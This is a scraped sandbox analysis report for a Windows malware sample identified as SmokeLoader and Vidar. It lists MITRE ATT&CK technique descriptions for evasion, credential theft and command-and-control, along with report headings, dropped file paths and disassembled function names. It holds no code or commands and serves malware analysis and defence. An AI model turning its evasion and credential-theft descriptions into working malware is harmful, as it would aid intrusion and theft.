Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hOdgEiePTe.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\07935441808377509853245888

C:\ProgramData\17751769776028747586746530

C:\ProgramData\32486254918903413075240225

C:\ProgramData\56548476236695351411997877

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

C:\ProgramData\vcruntime140.dll

C:\Users\user\AppData\Local\Temp\5D03.dll

C:\Users\user\AppData\Local\Temp\7791.exe

C:\Users\user\AppData\Local\Temp\900B.exe

Windows Analysis Report
hOdgEiePTe.exe

Function 004017E2 Relevance: 3.1, APIs: 2, Instructions: 53
sleepnativeCOMMON

Function 004017E3 Relevance: 3.1, APIs: 2, Instructions: 53
sleepnativeCOMMON

Function 004017EE Relevance: 3.0, APIs: 2, Instructions: 47
sleepnativeCOMMON

Function 007864F7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 00401807 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Function 0040A1B0 Relevance: 22.6, APIs: 15, Instructions: 114
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre